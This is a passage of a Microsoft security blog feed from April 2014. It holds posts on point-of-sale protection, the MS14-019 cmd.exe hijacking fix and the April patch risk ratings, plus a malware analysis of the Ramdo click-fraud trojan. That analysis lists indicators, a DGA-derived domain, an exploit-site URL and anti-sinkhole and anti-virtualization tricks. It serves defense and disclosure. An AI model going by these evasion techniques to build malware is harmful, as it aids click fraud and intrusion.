href="/b/trustworthycomputing/archive/2014/04/04/article-29-working-group-says-microsoft-cloud-in-line-with-eu-data-protection-law.aspx" target="_blank">See more &gt;&gt;</a></p> <p></p>...(<a href="http://blogs.technet.com/b/trustworthycomputing/archive/2014/04/10/article-29-working-group-says-microsoft-cloud-in-line-with-eu-data-protection-law.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626738&AppID=9044&AppType=Weblog&ContentType=0" width="1" height="1">Brendon LynchCloudTrustBig DataStandardsCloud Computingcloud servicesMicrosoftpersonal dataDataEuropePrivacyMicrosoft Cloud Solutions Protecting Point of Sale Devices from Targeted Attackshttp://blogs.technet.com/b/security/archive/2014/04/09/protecting-point-of-sale-devices-from-targeted-attack.aspxWed, 09 Apr 2014 15:59:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:3e4441dc-6d7a-49d5-81ba-a1ff2db36b89Microsoft Security Staff0http://blogs.technet.com/b/security/rsscomments.aspx?WeblogPostID=3626103http://blogs.technet.com/b/security/commentapi.aspx?WeblogPostID=3626103http://blogs.technet.com/b/security/archive/2014/04/09/protecting-point-of-sale-devices-from-targeted-attack.aspx#comments<p>Posted by: <strong>Sean Finnegan</strong> Director, Cybersecurity</p> <p>Last week, we published a paper on &ldquo;<a href="http://enterprise.blob.core.windows.net/whitepapers/Retail-Threat-Modeling.pdf">Threat Modeling a Retail Environment</a>.&rdquo; The intent of this paper was to help provide the retail industry with risk and mitigation guidance that could be applied in their environment where there is a unique set of requirements and challenges.&nbsp; As a follow on to that information, today we published a new paper focused on &ldquo;<strong><a href="http://aka.ms/protectingpos">Protecting Point of Sale Devices from Targeted Attacks</a></strong>.&rdquo;&nbsp; Given point of sale (POS) devices were the focus of many recent targeted attacks in the retail industry, we thought this guidance would be helpful.&nbsp;<a href="/b/security/archive/2014/04/01/protecting-point-of-sale-devices-from-targeted-attack.aspx">Read more</a></p>...(<a href="http://blogs.technet.com/b/security/archive/2014/04/09/protecting-point-of-sale-devices-from-targeted-attack.aspx">read more</a>)<img src="http://blogs.technet.com/aggbug.aspx?PostID=3626103&AppID=5043&AppType=Weblog&ContentType=0" width="1" height="1">Threat modeling retailRetail and SecurityTargeted AttacksPoint of Sale attacks MS14-019 – Fixing a binary hijacking via .cmd or .bat filehttp://blogs.technet.com/b/srd/archive/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file.aspxTue, 08 Apr 2014 17:10:03 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:037a8636-d816-470d-b8f4-5bad8e479ebcswiat0<p style="text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">Command (.cmd) and batch (.bat) files can be directly provided as input to the </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> as if it is an executable. </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> uses the cmd.exe automatically to run the input .cmd or .bat.</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">Today, with the bulletin <a href="http://technet.microsoft.com/security/bulletin/MS14-019">MS14-019</a> we are fixing a vulnerability, where in particular scenario it is possible to hijack the cmd.exe with a copy present in the attacker controlled current working directory (CWD) of an affected application. </span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">The typical attack vector for this vulnerability is same as the DLL hijacking, i.e., via opening an application specific file in a WebDav/SMB share invoking the targeted application automatically because of file association. The targeted application will be vulnerable only if they ever do </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> on .cmd or .bat file irrespective of where the file is located. That means attacker need not control the .cmd or .bat file. Another important thing for exploiting this vulnerability, is that the application should set the directory from where the associated file was opened as its CWD. </span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">As such we are not aware of any application that is affected by this vulnerability. But we understand the security issue this vulnerability can pose to some of the applications, so we are addressing this as an important severity bulletin. </span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">The way we are fixing this issue is to always invoke the system version of the cmd.exe for the input .cmd or .bat file during process creation. This fix could affect applications which does </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> on .bat or .cmd file directly and depend on a different version of the cmd.exe other than the one present in Sytem directory by copying them in either application directory or CWD. Such applications should pass fully qualified path to the version of cmd.exe as input while performing </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">, and pass .cmd or .bat as input parameters. </span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">&nbsp;</span></p> <p style="margin:0in 0in 0pt;text-align:justify;"><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;">Applications passing just cmd.exe to the </span><a href="http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx"><span style="font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"><span style="color:#0000ff;">CreateProcess</span></span></a><span style="color:black;font-family:&#39;Calibri&#39;,&#39;sans-serif&#39;;font-size:11pt;"> to run the .cmd or .bat as input could also be vulnerable for similar binary hijacking. This bulletin is not to address such vulnerable usage since it is application specific problem as they are not passing fully qualified system path to cmd.exe. Such application should fixed to pass fully qualified cmd.exe path or just passing .cmd or .bat file as input.</span></p> <p style="margin:0in 0in 8pt;text-align:justify;"><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p style="text-align:justify;">- Swamy Shivaganga Nagaraju, MSRC engineering team</p> <p style="text-align:justify;"></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626892&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">MS14-019 CMD BAT CreateProcess Assessing risk for the April 2014 security updates http://blogs.technet.com/b/srd/archive/2014/04/08/assessing-risk-for-the-april-2014-security-updates.aspxTue, 08 Apr 2014 17:09:51 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:82e7006c-ed10-40fe-b947-6cb57fa1dee1swiat0<p style="text-align:justify;"><span style="font-family:Calibri;font-size:medium;">Today we released four security bulletins addressing 11 unique CVE&rsquo;s.&nbsp; Two bulletins have a maximum severity rating of Critical while the other two have a maximum severity rating of Important. We hope that the table below helps you prioritize the deployment of the updates appropriately for your environment.</span></p> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <table style="border-width:1px;border-style:solid;width:669px;height:82px;" border="1"> <tbody> <tr> <td><span style="font-size:medium;"><strong>Bulletin</strong></span></td> <td><span style="font-size:medium;"><strong>Most likely attack vector</strong></span></td> <td><span style="font-size:medium;"><strong>Max Bulletin Severity</strong></span></td> <td><span style="font-size:medium;"><strong>Max exploitability</strong></span></td> <td><span style="font-size:medium;"><strong>Likely first 30 days impact</strong></span></td> <td><span style="font-size:medium;"><strong>Platform mitigations and key notes</strong></span></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-017">MS14-017</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Word)</span></p> </td> <td><span style="font-size:medium;">Victim opens a malicious RTF or DOC/DOCX file.</span></td> <td><span style="font-size:medium;">Critical</span></td> <td>1</td> <td><span style="font-size:medium;">Likely to continue to see RTF and DOC based exploits for CVE-2014-1761.</span></td> <td><span style="font-size:medium;">Addresses vulnerability described by <a href="http://technet.microsoft.com/en-us/security/advisory/2953095">Security Advisory 2953095</a>, an issue under targeted attack.</span></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-018">MS14-018</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Internet Explorer)</span></p> </td> <td><span style="font-size:medium;">Victim browses to a malicious webpage.</span></td> <td><span style="font-size:medium;">Critical</span></td> <td>1</td> <td><span style="font-size:medium;">Likely to see reliable exploits developed within next 30 days.</span></td> <td></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-020">MS14-020</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Publisher)</span></p> </td> <td><span style="font-size:medium;">Victim opens malicious Publisher (.PUB) file.</span></td> <td><span style="font-size:medium;">Important</span></td> <td>1</td> <td><span style="font-size:medium;">While we may see reliable exploits developed within the next 30 days, unlikely to see widespread exploitation due to limited deployment of Publisher.</span></td> <td></td> </tr> <tr> <td> <p><span style="font-size:medium;"><a href="http://technet.microsoft.com/security/bulletin/MS14-019">MS14-019</a></span></p> <span style="font-family:Times New Roman;font-size:medium;"></span> <p><span style="font-size:medium;">(Windows File Handling)</span></p> </td> <td><span style="font-size:medium;">Attacker places malicious .bat and/or .cmd file on a network share from which a victim launches an application that calls CreateProcess in an unsafe manner.&nbsp; Similar attack vector as DLL preloading.</span></td> <td><span style="font-size:medium;">Important</span></td> <td>1</td> <td><span style="font-size:medium;">While this is an exploitable vulnerability, we have historically not seen widespread exploitation of this type of vulnerability.</span></td> <td><span style="font-size:medium;">More details about this vulnerability in <a href="http://blogs.technet.com/b/srd/archive/2014/04/08/ms14-019-fixing-a-binary-hijacking-via-cmd-or-bat-file.aspx">this SRD blog</a> post today.</span></td> </tr> </tbody> </table> <p><span style="font-family:Calibri;font-size:medium;">&nbsp;</span></p> <p>- Jonathan Ness, MSRC engineering team</p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626889&AppID=6147&AppType=Weblog&ContentType=0" width="1" height="1">Attack VectorRisk Asessment The April 2014 Security Updateshttp://blogs.technet.com/b/msrc/archive/2014/04/08/the-april-2014-security-updates.aspxTue, 08 Apr 2014 17:00:52 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:22479505-9a1d-485c-90a9-03d8c32b47fcDustin C. Childs0<p><span style="font-size:medium;">T. S. Elliot once said, &ldquo;What we call the beginning is often the end. And to make an end is to make a beginning. The end is where we start from.&rdquo; So as we put one season to bed, let&rsquo;s start another by looking at the </span><a href="http://technet.microsoft.com/security/bulletin/MS14-apr"><span style="color:#0563c1;font-size:medium;">April security updates</span></a><span style="font-size:medium;">. Today, we release four bulletins to address 11 CVEs in Microsoft Windows, Internet Explorer and Microsoft Office. The update for </span><a href="http://technet.microsoft.com/security/bulletin/ms14-017"><span style="color:#0563c1;font-size:medium;">Microsoft Word</span></a><span style="font-size:medium;"> addresses the issues described in </span><a href="http://technet.microsoft.com/security/advisory/2953095"><span style="color:#0563c1;font-size:medium;">Microsoft Security Advisory 2953095</span></a><span style="font-size:medium;">. For those who prioritize, we recommend this bulletin as well as the update for Internet Explorer be on the top of your list.</span></p> <p><span style="font-size:medium;">We would be remiss if we did not mention another end; the end of support for Windows XP and Office 2003. The updates provided by MS14-018 and MS14-019 will be the final security updates for Windows XP; MS14-017 and MS14-020 are the final update for Office 2003. &nbsp;For those who haven&rsquo;t migrated yet, I recommend visiting the </span><a href="http://blogs.technet.com/b/security/archive/2014/03/24/cyber-threats-to-windows-xp-and-guidance-for-small-businesses-and-individual-consumers.aspx"><span style="color:#0563c1;font-size:medium;">Microsoft Security Blog</span></a><span style="font-size:medium;">, where my colleague Tim Rains provides guidance for consumers and small businesses who may have questions about how end of support affects them. Enterprise administrators will also find this a worthwhile read. </span></p> <p><span style="font-size:medium;">Here&rsquo;s an overview of all the updates released this month:</span></p> <p><i><span style="font-size:medium;">Click to enlarge</span></i></p> <p><i><span style="font-size:medium;"><a href="http://blogs.technet.com/cfs-file.ashx/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/deployment.jpg"><img alt=" " src="http://blogs.technet.com/resized-image.ashx/__size/550x0/__key/communityserver-blogs-components-weblogfiles/00-00-00-45-71/deployment.jpg" border="0" /></a><br /></span></i></p> <p><span style="font-size:medium;">Our top priorities for this month are MS14-018 and MS14-017, which address issues in Internet Explorer and Microsoft Word respectively.</span></p> <p><a href="http://technet.microsoft.com/security/bulletin/ms14-018"><span style="color:#0563c1;font-size:medium;">MS14-018 | Cumulative Update for Internet Explorer</span></a></p> <p><span style="font-size:medium;">This security update resolves six privately reported vulnerabilities in Internet Explorer. These vulnerabilities could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. While the issues addressed by this bulletin are very straightforward, I wanted to specifically call your attention to the updates for Internet Explorer 11 on Windows 8.1 and Windows Server 2012 R2. For these platforms, the update is not cumulative &ndash; it only addresses this issues described in this bulletin. You also have the option of installing KB2919355, which is a cumulative update for Windows 8.1, Windows RT 8.1, and Windows Server 2012 R2. In addition to previous updates for these operating systems, it includes enhancements such as improved Internet Explorer 11 compatibility for enterprise applications, usability improvements, extended mobile device management, and improved hardware support. Additionally, for Windows Server 2012 R2, it includes support for clustering configurations for hosters. For more information about this update, see </span><a href="http://support.microsoft.com/kb/2919355"><span style="color:#0563c1;font-size:medium;">Microsoft Knowledge Base Article 2919355</span></a><span style="font-size:medium;">.</span></p> <p><span style="font-size:medium;">Similarly, customers running Internet Explorer 11 on Windows 7 and Windows Server 2008 R2 also can choose a cumulative update: </span><a href="http://support.microsoft.com/kb/2929437"><span style="color:#0563c1;font-size:medium;">KB2929437</span></a><span style="font-size:medium;">. In addition to previous updates for Internet Explorer 11 on these operating systems, it includes enhancements such as improved Internet Explorer 11 compatibility for enterprise applications. If you install this cumulative update, you will not need to install the KB2936068 update offered through MS14-018. There may also be some who overlook the update for Internet Explorer 10. For this version of the browser, the update is non-security. The issues addressed by this bulletin do not impact Internet Explorer 10, but the update does include non-security related changes. For more information about the non-security-related fixes that are included in this update, see&nbsp;<a href="http://support.microsoft.com/kb/2936068">Microsoft Knowledge Base Article 2936068</a></span><span style="font-size:medium;">.</span></p> <p><a href="http://technet.microsoft.com/security/bulletin/ms14-017"><span style="color:#0563c1;font-size:medium;">MS14-017 | Vulnerabilities in Microsoft Word and Office Web Apps Could Allow Remote Code Execution</span></a></p> <p><span style="font-size:medium;">This security update resolves one publicly disclosed vulnerability and two privately reported vulnerabilities in Microsoft Word. The most severe of these vulnerabilities could allow remote code execution if a specially crafted file is opened in an affected version of Microsoft Office software. This security update also addresses the vulnerability first described in </span><a href="http://technet.microsoft.com/security/advisory/2953095"><span style="color:#0563c1;font-size:medium;">Microsoft Security Advisory 2953095</span></a><span style="font-size:medium;">. If you have installed the Fix it provided through this advisory, you should remove it once you apply the update to ensure RTF files open correctly. </span></p> <p><span style="font-size:medium;">Finally, we are revising <a href="http://technet.microsoft.com/security/advisory/2755801"><span style="color:#0563c1;">Security Advisory 2755801</span></a> with the latest update for Adobe Flash Player in Internet Explorer. The update addresses the vulnerabilities described in Adobe Security bulletin APSB14-09 For more information about this update, including download links, see Microsoft Knowledge Base Article 2942844.</span></p> <p><span style="font-size:medium;">Watch the bulletin overview video below for a brief summary of today&#39;s releases.</span></p> <p><span style="font-size:medium;"><object width="500" height="281"><param name="movie" value="//www.youtube.com/v/jz55QSOaFbI?version=3&amp;hl=en_US" /><param name="allowFullScreen" value="true" /><param name="allowscriptaccess" value="always" /><embed width="500" height="281" src="http://www.youtube.com/v/jz55QSOaFbI?version=3&amp;hl=en_US" type="application/x-shockwave-flash" /></object></span></p> <p><span style="font-size:medium;">For more information about this month&rsquo;s security updates, including the detailed view of the Exploit Index broken down by CVE, visit the <a href="http://technet.microsoft.com/security/bulletin/MS14-apr"><span style="color:#0563c1;">Microsoft Bulletin Summary Web page</span></a>. </span></p> <p><span style="font-size:medium;">William Peteroy and I will host the monthly bulletin webcast, scheduled for Wednesday, April 9, 2014, at 11 a.m. PDT. I invite you to register <a href="https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032572978&amp;Culture=en-US"><span style="color:#0563c1;">here</span></a>, and tune in to learn more about this month&rsquo;s security bulletins and advisories. </span></p> <p><span style="font-size:medium;">For all the latest information, you can also follow us at <a href="http://www.twitter.com/msftsecresponse"><span style="color:#0563c1;">@MSFTSecResponse</span></a>. </span></p> <p><span style="font-size:medium;">Please join me in wishing Windows XP and Office 2003 a fond farewell as they head towards the sunset of their lives. I look forward to hearing your questions about this month&rsquo;s release in our webcast tomorrow.</span></p> <p><span style="font-size:medium;">Thanks, <br /> <a href="http://blogs.technet.com/b/msrc/about.aspx#Dustin_Childs"><span style="color:#0563c1;">Dustin Childs</span></a></span><span style="font-size:medium;"> <br /> Group Manager, Response Communications<br /> Microsoft Trustworthy Computing</span></p><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626672&AppID=4571&AppType=Weblog&ContentType=0" width="1" height="1">Microsoft Windowsmonthly bulletin releaseSecurity BulletinBulletinsInternet Explorer (IE)Microsoft Office MSRT April 2014 – Ramdohttp://blogs.technet.com/b/mmpc/archive/2014/04/08/msrt-april-2014-ramdo.aspxTue, 08 Apr 2014 16:00:00 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:de99ef72-d34b-4299-8f69-3122f0d8ba9bmsft-mmpc0http://blogs.technet.com/b/mmpc/archive/2014/04/08/msrt-april-2014-ramdo.aspx#comments<div class="ExternalClass7ACCDACE2EE447D5AAA088FB98DDF72D"> <p>This month we added <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Ramdo">Win32/Ramdo</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Kilim">Win32/Kilim</a> to the Microsoft Malicious Software Removal Tool. In this blog, we will focus on Ramdo and some of what we have since found out about this relatively new trojan family. Ramdo, a click-fraud bot with built-in antisinkhole and antivirtualization code, was first found in the wild in December 2013.</p> <h3>Telemetry</h3> <p>Compared to other big families, Win32/Ramdo&rsquo;s impact is relatively small in terms of the number of infected machines. However, when one of our customers gets infected with it, the impact is big on that machine: bandwidth and CPU power are exhausted to generate profit for the malware authors, and exploits can be deployed to install additional malware. We aim to resolve this problem for our customers by adding this family to the MSRT.</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo1.png"><img width="500" alt="Machine count" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo1.png" border="0" /></a>&nbsp;</p> <em>Figure 1: Ramdo infected machines during February and March 2014</em><br /> <h3>Infection</h3> <p>Ramdo has been deployed by exploit kits such as <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Exploit:HTML/Pangimop.C"> HTML/Pangimop</a> (also known as Magnitude) as well as the <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Vobfus">Vobfus</a> and <a href="http://www.microsoft.com/security/portal/threat/encyclopedia/Entry.aspx?Name=Win32/Beebone">Beebone</a> families. It is usually installed in the background without being noticed, and immediately copies itself into the <a href="http://www.microsoft.com/security/portal/mmpc/shared/variables.aspx#startupfolder">&lt;startup&gt;</a> folder with one of following names:</p> <ul> <li><em>EPUHelp.exe</em></li> <li><em>HpM3Util.exe</em></li> </ul> <p>An additional DLL is also created by setting the IMAGE_FILE_DLL flag in the PE file header&rsquo;s characteristics. It is then dropped to one of the following paths:</p> <ul> <li><em> <a href="http://www.microsoft.com/security/portal/mmpc/shared/variables.aspx#appdata">%AppData%</a>\version.dll</em></li> <li><em> <a href="http://www.microsoft.com/security/portal/mmpc/shared/variables.aspx#appdata">%AppData%</a>\Adobe\acupx217.dll</em></li> </ul> <p>The DLL is encrypted by the <em>EncryptFileW </em>API and is injected into the newly created system process (<em>services.exe </em>or <em>taskhost.exe</em>) as the trojan&rsquo;s payload.</p> <h3>Payload</h3> <p>Ramdo stores its configuration data in the registry, encrypted with RC4. Depending on the variant, one of the following registry values is used to store configuration related to the command and control (C&amp;C) component (for example, the bot version, or the seed to generate the&nbsp;C&amp;C domain):</p> <ul> <li><em>HKCU\SOFTWARE\Adobe\Adobe ARM\1.0\ARM\tLast_ReadedSpec</em></li> <li><em>HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\IPM\iTestPropulsion</em></li> </ul> <p>Also depending on the variants, one of the&nbsp;following values is used to store configuration related to click-fraud (for example, the click interval, which websites to click, or the user-agent string):</p> <ul> <li> <div><em>HKCU\SOFTWARE\Adobe\Adobe ARM\1.0\ARM\tLastCollab_doc</em></div> </li> <li> <div><em>HKCU\SOFTWARE\Adobe\Acrobat Reader\10.0\IPM\iTestShears</em></div> </li> </ul> <p>The RC4 key used in the decryption of data received from the C&amp;C, and the configuration stored in the registry, is generated in this way:</p> <ul> <li> <div><em>ReadRegStringValue(&ldquo;HKLM\Software\Microsoft\Cryptography\MachineGuid&rdquo;) + &ldquo;iU&rdquo;</em></div> </li> </ul> <p>The key is sent to the C&amp;C along with the&nbsp;following information about the infected PC in the initial phone-home request:</p> <ul> <li>Operating system version.</li> <li>Whether the machine is running in a virtualization environment (Hyper-V, VMWARE, VirtualBox).</li> <li>The installed Flash Player version.</li> <li>The number of processors.</li> <li>The RC4 key to decrypt response.</li> </ul> <p>The request sent to the C&amp;C is encrypted with another embedded public key (it can be imported with the CryptImportKey API).&nbsp; A recent example extracted (base64 encoded) is:</p> <ul> <li><em>BgIAAACkAABSU0ExAAQAAAEAAQDJ9Nl4XvlyD9PmguEaeUt2auCZm2994FcdY2aCGMuYvc71sqLkOyf3Q1Cp4q/s3CXgXr5ifomWiF4D22eWsEPqoI1RyZ8LwYaCVD11WrwtoST4BPwMPARLvNJGvAKzcXpn1adDvprXsfGW1r3YeKPw6KZLPdCfvLBl3U9xTJ8lrg==</em></li> </ul> <p>The C&amp;C domain is generated by a Domain Generation Algorithm (DGA) that avoids storing the C&amp;C domain as plain text. However, unlike other DGAs that use date/time as a seed, Ramdo uses a fixed seed value and is initially embedded in the executable, but can be updated by the C&amp;C server later. The DGA can be written in C# like this:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo2.png"><img width="500" alt="DGA" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo2.png" border="0" /></a>&nbsp;</p> <em>Figure 2: Ramdo uses a DGA to generate the C&amp;C domain</em> <p>With this code, seed value <em>0x90002B44C </em>can generate the domain <em>ceigqweqwaywiqgu.org.</em></p> <h3>Click-fraud</h3> <p>To do click-fraud, Win32/Ramdo starts one or more new instances of one of the following system processes:</p> <ul> <li> <div><em>iexplore.exe</em></div> </li> <li> <div><em>twunk_32.exe</em></div> </li> <li> <div><em>winhlp32.exe</em></div> </li> </ul> <p>It injects the payload DLL there to start hidden clicks. The click websites are first returned from the C&amp;C and then stored in the registry as mentioned above.&nbsp; After RC4 decryption, the configuration may look like this:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo3.png"><img style="width:1200px;height:22px;" alt="RC4" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo3.png" border="0" /></a>&nbsp;</p> <em>Figure 3: The click websites&nbsp;stored in the registry after RC4 decryption - where <em>searchliiter.com </em>and <em>searchwander.com </em>are the websites to start clicking with</em><br /> <p>Like many click-fraud bots, Ramdo creates WebBrowser control with CLSID {8856f961-340a-11d0-a96b-00c04fd705a2}, parses through the HTML content retrieved, and follows the href found in the document to simulate human clicks. The exception for Ramdo is that it will skip the href if it contains the following strings:</p> <ul> <li><em>.pdf</em></li> <li><em>.xml</em></li> <li><em>/contact</em></li> <li><em>/faq</em></li> <li><em>/feed</em></li> <li><em>/flagcontent</em></li> <li><em>/forgotpassword</em></li> <li><em>/login</em></li> <li><em>/password</em></li> <li><em>/register</em></li> <li><em>/rss</em></li> <li><em>/terms</em></li> <li><em>/tweet</em></li> <li><em>action=embed-flash</em></li> <li><em>javascript:</em></li> <li><em>mailto:</em></li> <li><em>registration</em></li> </ul> <p>It makes sense that Ramdo wants to avoid clicking on these strings as they are likely not related to advertisements and can be very noisy. The clicks are all done in background, to make sure users won&rsquo;t notice the click.</p> <p>Ramdo also hooks following APIs:</p> <ul> <li> <div><em>CoCreateInstance</em></div> </li> <li> <div><em>DialogBoxIndirectParamAorW</em></div> </li> <li> <div><em>waveOutOpen</em></div> </li> <li> <div><em>waveOutSetVolume</em></div> </li> </ul> <p>It also disables sounds, popup dialog/message boxes, and file download dialogs by changing their behaviors inside the click process.</p> <p>When loaded in a web browser, one of the clicked websites can look like this:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo4.png"><img width="500" alt="sponsored links" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo4.png" border="0" /></a>&nbsp;</p> <em>Figure 4: An example of a web page showing the &quot;sponsored links&quot; clicked by Ramdo</em> <p>It is also interesting to note that the traffic was sold to exploit kit owners, and one of the clicks was redirected to <em>sketch.texture.victimizedppxv.org/praising.php</em> which loaded exploits targeting Adobe Flash Player.</p> <h3>Antisecurity measures</h3> <p>Ramdo authors put in a lot of effort to&nbsp;make analysis more difficult. As well as common tricks like dynamically resolving APIs and decrypting strings to make reverse engineering harder, Ramdo also checks if it&rsquo;s running under a&nbsp;virtualization guest OS and sends that information to the C&amp;C. If virtualization is detected, instead of exiting the bot immediately the C&amp;C server returns with error 404 or 502.&nbsp;The bot keeps running so that it looks like the C&amp;C is not available, although nothing is wrong on the bot side.</p> <p>Another trick the authors included was that the trojan tries to detect if the C&amp;C servers get sinkholed or redirected. Look at this function:</p> <p><a href="http://www.microsoft.com/security/portal/blog-images/a/Ramdo5.png"><img width="500" alt="Check C&amp;C" src="http://www.microsoft.com/security/portal/blog-images/a/Ramdo5.png" border="0" /></a>&nbsp;</p> <em>Figure 5: Ramdo tires to detect whether&nbsp;its C&amp;C servers get sinkholed or redirected</em> <p>It&rsquo;s called right before sending a request to the C&amp;C server. The &quot;Cnc&quot; parameter contains the DGA-generated domain, it first gets resolved to the IP address and then Ramdo calls <em>gethostbyaddr </em>to do a reverse DNS lookup on the resolved IP to get the actual host name. It checks for one of these strings:</p> <ul> <li><em>sinkhole</em></li> <li><em>malware</em></li> <li><em>suspended</em></li> </ul> <p>If the host name contains one of these strings then the request will not be sent to the C&amp;C, in an attempt to avoid server-side analysis. We can only assume the author expects Ramdo to survive from takedown with this method.</p> <h3>Final words</h3> <p>Ramdo has simple functionality but with many techniques that make analysis harder. Despite the efforts of the malware author to avoid detection, the MSRT is ready to clean it up . As usual, the best protection from this and other malware and potentially unwanted software is an up-to-date, real-time security product, such as <a href="http://windows.microsoft.com/en-us/windows/security-essentials-download">Microsoft Security Essentials</a>.</p> <p><em>Shawn Wang</em><br /><em>MMPC</em></p> </div><div style="clear:both;"></div><img src="http://blogs.technet.com/aggbug.aspx?PostID=3626552&AppID=6258&AppType=Weblog&ContentType=0" width="1" height="1"> Adrienne’s View: Cloud security benefits belie pre-deployment doubtshttp://blogs.technet.com/b/trustworthycomputing/archive/2014/04/07/adrienne-s-view-cloud-security-benefits-belie-pre-deployment-doubts.aspxMon, 07 Apr 2014 20:46:48 GMTd5e57398-b9ef-4490-9955-07cbb4e4a80d:25b2feb6-24fe-47b1-9dee-8d065f7dca96Trusted Cloud Team0<p><strong>By Adrienne Hall, General Manager, Trustworthy Computing</strong></p> <p>Cloud security is often better than customers expect it to be. I&rsquo;ve blogged about that trend before, including the <a target="_blank" href="/b/trustworthycomputing/archive/2013/06/11/cloud-trust-study-security-privacy-and-reliability-benefits-for-smbs-in-the-u-s.aspx">Cloud Trust Study</a> (commissioned by Microsoft and conducted by comScore) showing high percentages of small to mid-sized businesses (SMBs) seeing improved security after moving to the cloud.</p> <p>Two recent studies add further evidence that security apprehensions persist -- but prove unwarranted for many cloud customers after rolling out the cloud service.&nbsp; <a target="_blank" 